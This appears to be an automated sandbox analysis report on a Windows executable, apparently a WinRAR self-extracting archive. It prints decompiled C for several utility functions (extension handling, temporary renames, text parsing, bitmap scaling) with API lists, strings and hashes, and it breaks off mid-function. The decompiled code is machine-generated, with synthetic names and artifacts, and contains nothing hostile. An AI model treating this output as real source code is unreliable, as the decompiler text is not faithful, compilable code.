Instruction ID: 7a59c8e49880ccaf67bdd9c49970615a84f975d47ba05b8a992ea5883b8cce28
Opcode Fuzzy Hash: 718c724857e7c6dfd136cbb566ce27b7f592dcfc7f4a1650c798727364308f29
Instruction Fuzzy Hash: 2B31B4326042196BEB24AA65DC46BBB73ACDF44350F14007BF905E62D1EF7CDD9086AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A394, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A394(intOrPtr _a4, intOrPtr _a8, char _a12) {
				short _t13;
				short _t16;
				short _t19;
				signed short* _t20;
				signed int _t22;
				signed short _t23;
				intOrPtr* _t25;
				signed short _t27;
				short _t29;
				void* _t31;
				intOrPtr _t34;
				signed short* _t40;
				signed short _t41;
				signed short _t47;
				short* _t48;
				void* _t50;
				signed short* _t51;
				signed short* _t52;

				_t34 = _a4;
				_t50 = E0040A25D(_t34);
				_t54 = _t50;
				if(_t50 != 0) {
					_t3 = _t50 + 2; // 0x2
					_t48 = _t3;
					__eflags =  *_t48;
					if( *_t48 != 0) {
						L4:
						_t13 = E004119A6(_t48, L"exe");
						__eflags = _t13;
						if(_t13 == 0) {
							L6:
							E0041A0EF(_t48, L"rar");
							L7:
							_t55 = _a12;
							if(_a12 != 0) {
								_t10 = _t50 + 4; // 0x4
								_t49 = _t10;
								_t16 = E00410760( *_t10 & 0x0000ffff);
								__eflags = _t16;
								if(_t16 == 0) {
									L25:
									return E0041A0EF(_t49, L"00");
								}
								_t51 = _t50 + 6;
								_t19 = E00410760( *_t51 & 0x0000ffff);
								__eflags = _t19;
								if(_t19 == 0) {
									goto L25;
								}
								_t20 = _t51;
								while(1) {
									 *_t20 =  *_t20 + 1;
									__eflags = ( *_t20 & 0x0000ffff) - 0x3a;
									if(( *_t20 & 0x0000ffff) != 0x3a) {
										break;
									}
									_t11 = _t20 - 2; // -7
									_t40 = _t11;
									__eflags =  *_t40 - 0x2e;
									if( *_t40 == 0x2e) {
										_t41 = 0x41;
										 *_t20 = _t41;
										return _t20;
									}
									_t47 = 0x30;
									 *_t20 = _t47;
									_t20 = _t40;
								}
								return _t20;
							}
							_t52 = E0040A311(_t55, _t34);
							while(1) {
								 *_t52 =  *_t52 + 1;
								_t22 =  *_t52 & 0x0000ffff;
								if(_t22 != 0x3a) {
									break;
								}
								_t23 = 0x30;
								 *_t52 = _t23;
								_t52 = _t52;
								__eflags = _t52 - _t34;
								if(_t52 < _t34) {
									L13:
									_t25 = _t34 + E0041A0A7(_t34) * 2;
									while(1) {
										__eflags = _t25 - _t52;
										if(_t25 == _t52) {
											break;
										}
										 *((short*)(_t25 + 2)) =  *_t25;
										_t25 = _t25;
										__eflags = _t25;
									}
									_t27 = 0x31;
									_t52[1] = _t27;
									return _t27;
								}
								_t29 = E00410760( *_t52 & 0x0000ffff);
								__eflags = _t29;
								if(_t29 == 0) {
									goto L13;
								}
							}
							return _t22;
						}
						__eflags = E004119A6(_t48, L"sfx");
						if(__eflags != 0) {
							goto L7;
						}
						goto L6;
					}
					_t31 = E0041A0A7(_t34);
					__eflags = _t31 - _a8 + 0xfffffffd;
					if(_t31 < _a8 + 0xfffffffd) {
						goto L6;
					}
					goto L4;
				}
				E004107BC(_t54, _t34, L".rar", _a8);
				_t50 = E0040A25D(_t34);
				goto L7;
			}

0x0040a395
0x0040a3a1
0x0040a3a3
0x0040a3a5
0x0040a3c0
0x0040a3c0
0x0040a3c3
0x0040a3c7
0x0040a3db
0x0040a3e1
0x0040a3e6
0x0040a3e8
0x0040a3f9
0x0040a3ff
0x0040a406
0x0040a406
0x0040a40b
0x0040a460
0x0040a460
0x0040a467
0x0040a46c
0x0040a46e
0x0040a4ab
0x00000000
0x0040a4b7
0x0040a470
0x0040a477
0x0040a47c
0x0040a47e
0x00000000
0x00000000
0x0040a480
0x0040a495
0x0040a495
0x0040a49b
0x0040a49f
0x00000000
0x00000000
0x0040a484
0x0040a484
0x0040a487
0x0040a48b
0x0040a4a5
0x0040a4a6
0x00000000
0x0040a4a6
0x0040a48f
0x0040a490
0x0040a493
0x0040a493
0x00000000
0x0040a495
0x0040a413
0x0040a430
0x0040a430
0x0040a433
0x0040a43a
0x00000000
0x00000000
0x0040a419
0x0040a41a
0x0040a41e
0x0040a41f
0x0040a421
0x0040a43e
0x0040a445
0x0040a453
0x0040a453
0x0040a455
0x00000000
0x00000000
0x0040a44d
0x0040a452
0x0040a452
0x0040a452
0x0040a459
0x0040a45a
0x00000000
0x0040a45a
0x0040a427
0x0040a42c
0x0040a42e
0x00000000
0x00000000
0x0040a42e
0x00000000
0x0040a430
0x0040a3f5
0x0040a3f7
0x00000000
0x00000000
0x00000000
0x0040a3f7
0x0040a3ca
0x0040a3d7
0x0040a3d9
0x00000000
0x00000000
0x00000000
0x0040a3d9
0x0040a3b1
0x0040a3bc
0x00000000

APIs

Part of subcall function 0040A25D: _wcsrchr.LIBCMT ref: 0040A271

_wcslen.LIBCMT ref: 0040A3CA
_wcscpy.LIBCMT ref: 0040A3FF

Part of subcall function 004107BC: _wcslen.LIBCMT ref: 004107C2
Part of subcall function 004107BC: _wcsncat.LIBCMT ref: 004107DC

_wcslen.LIBCMT ref: 0040A43F
_wcscpy.LIBCMT ref: 0040A4B1

Strings

.rar, xrefs: 0040A3AB
rar, xrefs: 0040A3F9
sfx, xrefs: 0040A3EA
exe, xrefs: 0040A3DB

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$_wcscpy$_wcsncat_wcsrchr
String ID: .rar$exe$rar$sfx
API String ID: 1023950463-630704357
Opcode ID: cf391c08578fe450a7b17254d50292610bea358ff3c396b036b08305ad277bbe
Instruction ID: 5c83c7804f75ba235f11fdfc8eb3531c80003f1497979a94fe42e1b71ee26e88
Opcode Fuzzy Hash: cf391c08578fe450a7b17254d50292610bea358ff3c396b036b08305ad277bbe
Instruction Fuzzy Hash: 6C31073510431196C225BB219C4AA7B73A8DF55754B20483FF882BB1D2E7FC98E1926F

Uniqueness

Uniqueness Score: -1.00%

Function 00408295, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00408295() {
				void* __ebx;
				void* _t38;
				short _t39;
				long _t41;
				void* _t46;
				short _t48;
				void* _t73;
				WCHAR* _t74;
				void* _t76;
				void* _t83;
				void* _t86;
				void* _t87;
				void* _t91;
				void* _t93;

				E00419DD4(E0042926D, _t91);
				E0041A3E0(0x5028);
				_t74 =  *(_t91 + 8);
				_t38 = _t91 - 0x5034;
				__imp__GetLongPathNameW(_t74, _t38, 0x800, _t83, _t87, _t73);
				if(_t38 == 0 || _t38 >= 0x800) {
					L19:
					_t39 = 0;
					__eflags = 0;
				} else {
					_t41 = GetShortPathNameW(_t74, _t91 - 0x4034, 0x800);
					if(_t41 == 0) {
						goto L19;
					} else {
						_t98 = _t41 - 0x800;
						if(_t41 >= 0x800) {
							goto L19;
						} else {
							 *((intOrPtr*)(_t91 - 0x10)) = E0040A0CE(_t98, _t91 - 0x5034);
							_t85 = E0040A0CE(_t98, _t91 - 0x4034);
							if( *_t45 == 0) {
								goto L19;
							} else {
								_t46 = E004119A6( *((intOrPtr*)(_t91 - 0x10)), _t85);
								_t100 = _t46;
								if(_t46 == 0) {
									goto L19;
								} else {
									_t48 = E004119A6(E0040A0CE(_t100, _t74), _t85);
									if(_t48 != 0) {
										goto L19;
									} else {
										 *(_t91 - 0x1010) = _t48;
										_t86 = 0;
										while(1) {
											_t103 =  *(_t91 - 0x1010);
											if( *(_t91 - 0x1010) != 0) {
												break;
											}
											E0041078F(_t91 - 0x1010, _t74, 0x800);
											E0040D452(E0040A0CE(_t103, _t91 - 0x1010), 0x800, L"rtmp%d", _t86);
											_t93 = _t93 + 0x10;
											if(E00409026(_t91 - 0x1010) != 0) {
												 *(_t91 - 0x1010) = 0;
											}
											_t86 = _t86 + 0x7b;
											if(_t86 < 0x2710) {
												continue;
											} else {
												_t107 =  *(_t91 - 0x1010);
												if( *(_t91 - 0x1010) == 0) {
													goto L19;
												} else {
													break;
												}
											}
											goto L20;
										}
										E0041078F(_t91 - 0x3034, _t74, 0x800);
										_push(0x800);
										E0040A238(_t107, _t91 - 0x3034,  *((intOrPtr*)(_t91 - 0x10)));
										if(MoveFileW(_t91 - 0x3034, _t91 - 0x1010) == 0) {
											goto L19;
										} else {
											E00408533(_t91 - 0x2034);
											 *(_t91 - 4) =  *(_t91 - 4) & 0x00000000;
											_t76 = 0;
											if(E00409026( *(_t91 + 8)) == 0) {
												_t76 = E004086D1(_t91 - 0x2034,  *(_t91 + 8), 0xa);
											}
											MoveFileW(_t91 - 0x1010, _t91 - 0x3034);
											if(_t76 != 0) {
												E004087BE(_t91 - 0x2034);
												E0040880C(_t91 - 0x2034);
											}
											 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
											E004089F9(_t76, _t91 - 0x2034);
											_t39 = 1;
										}
									}
								}
							}
						}
					}
				}
				L20:
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t39;
			}

0x0040829a
0x004082a4
0x004082aa
0x004082b5
0x004082bd
0x004082c5
0x00408452
0x00408452
0x00408452
0x004082d3
0x004082dc
0x004082e4
0x00000000
0x004082ea
0x004082ea
0x004082ec
0x00000000
0x004082f2
0x004082fe
0x0040830d
0x00408313
0x00000000
0x00408319
0x0040831d
0x00408322
0x00408324
0x00000000
0x0040832a
0x00408332
0x00408339
0x00000000
0x0040833f
0x0040833f
0x00408346
0x00408348
0x00408348
0x00408350
0x00000000
0x00000000
0x0040835b
0x00408374
0x00408379
0x0040838a
0x0040838e
0x0040838e
0x00408395
0x0040839e
0x00000000
0x004083a0
0x004083a0
0x004083a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004083a8
0x00000000
0x0040839e
0x004083b7
0x004083bc
0x004083c7
0x004083e4
0x00000000
0x004083e6
0x004083ec
0x004083f4
0x004083f8
0x00408401
0x00408413
0x00408413
0x00408423
0x00408427
0x0040842f
0x0040843a
0x0040843a
0x0040843f
0x00408449
0x0040844e
0x0040844e
0x004083e4
0x00408339
0x00408324
0x00408313
0x004082ec
0x004082e4
0x00408454
0x0040845a
0x00408462

APIs

__EH_prolog.LIBCMT ref: 0040829A
GetLongPathNameW.KERNEL32 ref: 004082BD
GetShortPathNameW.KERNEL32 ref: 004082DC

Part of subcall function 0040A0CE: _wcslen.LIBCMT ref: 0040A0D4

Part of subcall function 004119A6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,004099A9,?,00000000,?,00409AC3,00000000,-00000002,?,00000000,?), ref: 004119BC

_swprintf.LIBCMT ref: 00408374

Part of subcall function 0040D452: __vswprintf_c_l.LIBCMT ref: 0040D465

MoveFileW.KERNEL32(?,00000000), ref: 004083E0
MoveFileW.KERNEL32(00000000,?), ref: 00408423

Part of subcall function 0041078F: _wcsncpy.LIBCMT ref: 004107A6

Strings

rtmp%d, xrefs: 00408361

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen_wcsncpy
String ID: rtmp%d
API String ID: 506780119-3303766350
Opcode ID: f1bf0e391c12e9d067de1abf1fe91db047d4433e6189ee4d570509a93a963fc9
Instruction ID: bfe414c56c75f828797e56be7201d78762b98f3268cda305463d03e176cc2edc
Opcode Fuzzy Hash: f1bf0e391c12e9d067de1abf1fe91db047d4433e6189ee4d570509a93a963fc9
Instruction Fuzzy Hash: FB41637190122966CF20EB61CE459DF777CAF41384F0048BBB595B7186EB7C9B84CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D61A, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D61A(intOrPtr* __edi, void* __eflags) {
				char _v5;
				char _v8200;
				void* __ebx;
				void* __esi;
				intOrPtr _t18;
				short* _t28;
				void* _t31;
				signed int _t32;
				void* _t39;
				intOrPtr* _t41;
				short* _t42;
				void* _t43;

				_t41 = __edi;
				E0041A3E0(0x2004);
				_t42 = E0041C86E(_t31, _t39, __edi, 0x20000);
				if(_t42 == 0) {
					E004062F7(0x432a6c);
				}
				 *_t42 = 0;
				_t32 = 0;
				while(1) {
					_t18 = E0040D46E(0,  &_v8200, _t42,  *_t41, 0,  &_v5, 0x1000);
					 *_t41 = _t18;
					if(_t18 == 0) {
						break;
					}
					if( *_t42 != 0 || _v8200 != 0x7b) {
						if(_v8200 == 0x7d || E0041A0A7( &_v8200) + _t32 > 0xfffb) {
							break;
						} else {
							E0041A0C1(_t42,  &_v8200);
							_t32 = E0041A0A7(_t42);
							_t43 = _t43 + 0xc;
							if(_t32 <= 0) {
								L11:
								if(_v5 == 0) {
									E0041A0EF(_t42 + _t32 * 2, L"\r\n");
								}
								continue;
							}
							_t6 = _t32 * 2; // -2
							_t28 = _t42 + _t6 - 2;
							while( *_t28 == 0x20) {
								_t32 = _t32 - 1;
								_t28 = _t28;
								if(_t32 > 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					} else {
						continue;
					}
				}
				return _t42;
			}

0x0040d61a
0x0040d622
0x0040d633
0x0040d638
0x0040d63f
0x0040d63f
0x0040d646
0x0040d649
0x0040d6c0
0x0040d6d5
0x0040d6da
0x0040d6de
0x00000000
0x00000000
0x0040d651
0x0040d665
0x00000000
0x0040d67d
0x0040d685
0x0040d690
0x0040d692
0x0040d697
0x0040d6aa
0x0040d6ae
0x0040d6b9
0x0040d6bf
0x00000000
0x0040d6ae
0x0040d699
0x0040d699
0x0040d69d
0x0040d6a3
0x0040d6a5
0x0040d6a8
0x00000000
0x00000000
0x00000000
0x0040d6a8
0x00000000
0x0040d69d
0x00000000
0x00000000
0x00000000
0x0040d651
0x0040d6e9

APIs

_malloc.LIBCMT ref: 0040D62E

Part of subcall function 0041C86E: __FF_MSGBANNER.LIBCMT ref: 0041C891
Part of subcall function 0041C86E: __NMSG_WRITE.LIBCMT ref: 0041C898
Part of subcall function 0041C86E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004208E4,00000000,00000001,00000000,?,0041E92D,00000018,0042D8F0,0000000C,0041E9BE), ref: 0041C8E5

_wcslen.LIBCMT ref: 0040D66E
_wcscat.LIBCMT ref: 0040D685
_wcslen.LIBCMT ref: 0040D68B
_wcscpy.LIBCMT ref: 0040D6B9

Strings

}, xrefs: 0040D65D
l*C, xrefs: 0040D63A

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$AllocateHeap_malloc_wcscat_wcscpy
String ID: l*C$}
API String ID: 2020890722-4176477621
Opcode ID: 3c1cf442d6bc29eb9bd91b6f9734481275725d05dc062fa27814dcfee37dd97d
Instruction ID: d55ee5315c551b81823e3bdf8811042e3d3ef0233c1964ae64e124d26054213d
Opcode Fuzzy Hash: 3c1cf442d6bc29eb9bd91b6f9734481275725d05dc062fa27814dcfee37dd97d
Instruction Fuzzy Hash: E311D531D013195AEB30AAE088867AF72A89F14714F10047BE604E22D1EBBD999CCA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4F3, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4F3(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t27;
				signed int _t29;
				signed short* _t30;

				_t20 = _a8;
				_t30 = _a4;
				 *_t20 = 0;
				_t10 = E0040A017(_t30);
				if(_t10 == 0) {
					_t27 = 0x5c;
					if( *_t30 == _t27 && _t30[1] == _t27) {
						_t5 =  &(_t30[2]); // 0x4
						_t10 = E0041C359(_t5, _t27);
						if(_t10 != 0) {
							_t13 = E0041C359(_t10 + 2, _t27);
							if(_t13 == 0) {
								_t14 = E0041A0A7(_t30);
							} else {
								_t14 = (_t13 - _t30 >> 1) + 1;
							}
							_t29 = _t14;
							if(_t29 >= _a12) {
								_t29 = 0;
							}
							E0041C2C1(_t20, _t30, _t29);
							_t10 = 0;
							 *((short*)(_t20 + _t29 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E0040D452(_t20, _a12, L"%c:\\",  *_t30 & 0x0000ffff);
			}

0x0040a4f4
0x0040a4f9
0x0040a500
0x0040a503
0x0040a50a
0x0040a527
0x0040a52b
0x0040a533
0x0040a538
0x0040a541
0x0040a548
0x0040a551
0x0040a55b
0x0040a553
0x0040a557
0x0040a557
0x0040a561
0x0040a567
0x0040a569
0x0040a569
0x0040a56e
0x0040a576
0x0040a578
0x0040a578
0x0040a541
0x00000000
0x0040a57c
0x00000000

APIs

_swprintf.LIBCMT ref: 0040A51A

Part of subcall function 0040D452: __vswprintf_c_l.LIBCMT ref: 0040D465

_wcschr.LIBCMT ref: 0040A538
_wcschr.LIBCMT ref: 0040A548
_wcsncpy.LIBCMT ref: 0040A56E

Strings

%c:\, xrefs: 0040A510
%s.%d.tmp, xrefs: 0040A4F8

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf_wcsncpy
String ID: %c:\$%s.%d.tmp
API String ID: 2474501127-1021493711
Opcode ID: 0abc574dd8b42911ebfce1c492818b9301a3115704f0435a26a1030fcf6d18a0
Instruction ID: 8c5144371dd31eacdca20e7f065dcc57a62aa175c7afe3497e82ec1776206f0d
Opcode Fuzzy Hash: 0abc574dd8b42911ebfce1c492818b9301a3115704f0435a26a1030fcf6d18a0
Instruction Fuzzy Hash: E001042350434179DA20AA76AC46D6B27ECEFCA360714442FF484E31C1EA38D4A1C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 00418EC0, Relevance: 12.1, APIs: 8, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00418EC0(intOrPtr __ecx) {
				long _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v24;
				short _v32;
				struct tagMSG _v60;
				void* _t23;
				intOrPtr* _t25;
				short _t28;
				intOrPtr* _t30;

				_v12 = __ecx;
				_v8 = GetTickCount();
				_t23 = GetTickCount() - _v8;
				while(_t23 <= 0x2710) {
					_t25 =  *((intOrPtr*)(_v12 + 0xc));
					 *((intOrPtr*)( *_t25 + 0xe0))(_t25,  &_v16);
					if(_v16 != 4) {
						if(PeekMessageW( &_v60, 0, 0, 0, 0) != 0) {
							TranslateMessage( &_v60);
							DispatchMessageW( &_v60);
							GetMessageW( &_v60, 0, 0, 0);
						}
						_t23 = GetTickCount() - _v8;
						continue;
					}
					break;
				}
				__imp__#8( &_v32);
				_t28 = 3;
				_v32 = _t28;
				_t30 =  *((intOrPtr*)(_v12 + 0xc));
				_v24 = 0x96;
				return  *((intOrPtr*)( *_t30 + 0xd8))(_t30, 0x3f, 2,  &_v32, 0);
			}

0x00418ecf
0x00418ed4
0x00418ed9
0x00418f36
0x00418ee8
0x00418ef2
0x00418efc
0x00418f0e
0x00418f14
0x00418f1e
0x00418f2b
0x00418f2b
0x00418f33
0x00000000
0x00418f33
0x00000000
0x00418efc
0x00418f3e
0x00418f46
0x00418f4c
0x00418f53
0x00418f5a
0x00418f6e

APIs

GetTickCount.KERNEL32 ref: 00418ED2
GetTickCount.KERNEL32 ref: 00418ED7
PeekMessageW.USER32 ref: 00418F06
TranslateMessage.USER32(?), ref: 00418F14
DispatchMessageW.USER32 ref: 00418F1E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00418F2B
GetTickCount.KERNEL32 ref: 00418F31
VariantInit.OLEAUT32(?), ref: 00418F3E

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$CountTick$DispatchInitPeekTranslateVariant
String ID:
API String ID: 4242828014-0
Opcode ID: 6eac6453aad317e4faa9c919d99da2c4ca206f02e3b2647ecffca53be6cba02d
Instruction ID: d24a4fa72b497cc0b77ebefb6f99ba3aca52bec69e6b7dd3f5bebad55dc36eb8
Opcode Fuzzy Hash: 6eac6453aad317e4faa9c919d99da2c4ca206f02e3b2647ecffca53be6cba02d
Instruction Fuzzy Hash: B4212971E00209AFDB10DBE4D98CDDEBBBCEF48355F408466F901E7250D6389A46CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004197B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004197B0(long long __fp0, void* _a4, signed int _a8, void* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				struct HDC__* _v20;
				void* _v24;
				signed int _v28;
				signed int _v32;
				struct HDC__* _v36;
				void* _v40;
				signed int _v56;
				signed int _v60;
				void _v64;
				struct HDC__* _v92;
				short _v94;
				short _v96;
				signed int _v100;
				signed int _v104;
				struct tagBITMAPINFO _v108;
				void* __edi;
				signed int _t72;
				char* _t73;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				short _t87;
				signed int _t90;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				signed int _t108;
				intOrPtr* _t111;
				intOrPtr* _t113;
				signed int _t116;
				intOrPtr _t119;
				signed int _t141;
				long long* _t142;
				long long _t147;

				_t147 = __fp0;
				GetObjectW(_a4, 0x18,  &_v64);
				_t141 = _a8;
				asm("cdq");
				_t72 = _v56 * _t141 / _v60;
				_t116 = _a12;
				if(_t72 < _t116) {
					_t116 = _t72;
				}
				_t73 =  &_v8;
				__imp__CoCreateInstance(0x42b168, 0, 1, 0x42b060, _t73);
				if(_t73 < 0) {
					L15:
					return _a4;
				}
				_t75 = _v8;
				_t76 =  *((intOrPtr*)( *_t75 + 0x54))(_t75, _a4, 0, 2,  &_v12);
				_t77 = _v8;
				if(_t76 < 0) {
					L4:
					 *((intOrPtr*)( *_t77 + 8))(_t77);
					goto L15;
				}
				_push( &_v16);
				_v16 = 0;
				_push(_t77);
				if( *((intOrPtr*)( *_t77 + 0x28))() < 0) {
					L6:
					_t113 = _v12;
					 *((intOrPtr*)( *_t113 + 8))(_t113);
					_t77 = _v8;
					goto L4;
				}
				_t79 = _v16;
				asm("fldz");
				_t119 =  *_t79;
				_push(0);
				_push(_t119);
				_push(_t119);
				 *_t142 = _t147;
				_push(0);
				_push(0);
				_push(0x42b178);
				_push(_v12);
				_push(_t79);
				if( *((intOrPtr*)(_t119 + 0x20))() < 0) {
					_t111 = _v16;
					 *((intOrPtr*)( *_t111 + 8))(_t111);
					goto L6;
				}
				E0041A110(0,  &_v108, 0, 0x2c);
				_v100 =  ~_t116;
				_v96 = 1;
				_t87 = 0x20;
				_v94 = _t87;
				_v108.bmiHeader = 0x28;
				_v104 = _t141;
				_v92 = 0;
				_v20 = 0;
				_t90 = CreateDIBSection(0,  &_v108, 0,  &_v24, 0, 0);
				_a12 = _t90;
				asm("sbb eax, eax");
				if(( ~_t90 & 0x7ff8fff2) + 0x8007000e >= 0) {
					_t101 = _v8;
					 *((intOrPtr*)( *_t101 + 0x2c))(_t101,  &_a8);
					_t103 = _a8;
					 *((intOrPtr*)( *_t103 + 0x20))(_t103, _v12, _t141, _t116, 3);
					_push(_v24);
					_t105 = _a8;
					_push(_t141 * _t116 << 2);
					_push(_t141 << 2);
					_push( &_v40);
					_v40 = 0;
					_v36 = 0;
					_v32 = _t141;
					_v28 = _t116;
					_push(_t105);
					if( *((intOrPtr*)( *_t105 + 0x1c))() < 0) {
						DeleteObject(_a12);
					} else {
						_v20 = _a12;
					}
					_t108 = _a8;
					 *((intOrPtr*)( *_t108 + 8))(_t108);
				}
				_t94 = _v12;
				 *((intOrPtr*)( *_t94 + 8))(_t94);
				_t96 = _v16;
				 *((intOrPtr*)( *_t96 + 8))(_t96);
				_t98 = _v8;
				 *((intOrPtr*)( *_t98 + 8))(_t98);
				_t100 = _v20;
				if(_t100 == 0) {
					goto L15;
				}
				return _t100;
			}

0x004197b0
0x004197c2
0x004197cb
0x004197d1
0x004197d2
0x004197d5
0x004197da
0x004197dc
0x004197dc
0x004197de
0x004197f1
0x004197f9
0x0041994e
0x00000000
0x0041994e
0x004197ff
0x0041980f
0x00419814
0x00419817
0x00419819
0x0041981c
0x00000000
0x0041981c
0x00419827
0x00419828
0x0041982d
0x00419833
0x00419835
0x00419835
0x0041983b
0x0041983e
0x00000000
0x0041983e
0x00419843
0x00419846
0x00419848
0x0041984a
0x0041984b
0x0041984c
0x0041984d
0x00419850
0x00419851
0x00419852
0x00419857
0x0041985a
0x00419860
0x00419862
0x00419868
0x00000000
0x00419868
0x00419874
0x00419880
0x00419888
0x0041988c
0x0041988f
0x0041989d
0x004198a4
0x004198a7
0x004198aa
0x004198ad
0x004198b3
0x004198b8
0x004198c4
0x004198c6
0x004198d0
0x004198d3
0x004198e0
0x004198e3
0x004198e6
0x004198f1
0x004198f7
0x004198fb
0x004198fc
0x004198ff
0x00419902
0x00419905
0x0041990a
0x00419910
0x0041991d
0x00419912
0x00419915
0x00419915
0x00419923
0x00419929
0x00419929
0x0041992c
0x00419932
0x00419935
0x0041993b
0x0041993e
0x00419944
0x00419947
0x0041994c
0x00000000
0x00000000
0x00419955

APIs

GetObjectW.GDI32(00000200,00000018,?,00000000,00000000,745DBB20), ref: 004197C2
CoCreateInstance.OLE32(0042B168,00000000,00000001,0042B060,?,?), ref: 004197F1
_memset.LIBCMT ref: 00419874
CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004198AD
DeleteObject.GDI32(?), ref: 0041991D

Strings

(, xrefs: 0041989D

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateObject$DeleteInstanceSection_memset
String ID: (
API String ID: 1311793545-3887548279
Opcode ID: 61a187f55399b73b3a8dae06fc26573187194a48fd7aaa7a5e329d8ad4cab760
Instruction ID: 59abe19d735c068350a21635b5522754250516ec66282be87a360a8c68d9ed44
Opcode Fuzzy Hash: 61a187f55399b73b3a8dae06fc26573187194a48fd7aaa7a5e329d8ad4cab760
Instruction Fuzzy Hash: A8510DB5A00208EFCB00DFA5C898DAEBBB9FF89704B10845AF815DB250D775EE41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004191B6, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E004191B6(void* __ebx, void* __ecx, void* __eflags, signed short* _a4, signed short* _a7) {
				signed short* _v8;
				void* __edi;
				signed short* _t18;
				signed short* _t19;
				signed int _t20;
				signed int _t21;
				signed short _t22;
				void* _t23;
				void* _t25;
				signed int _t26;
				void* _t27;
				signed int _t29;
				signed short* _t30;
				void* _t34;
				signed short* _t35;
				short _t41;
				signed int _t42;
				signed short _t43;
				short _t44;
				void* _t45;
				signed short* _t46;
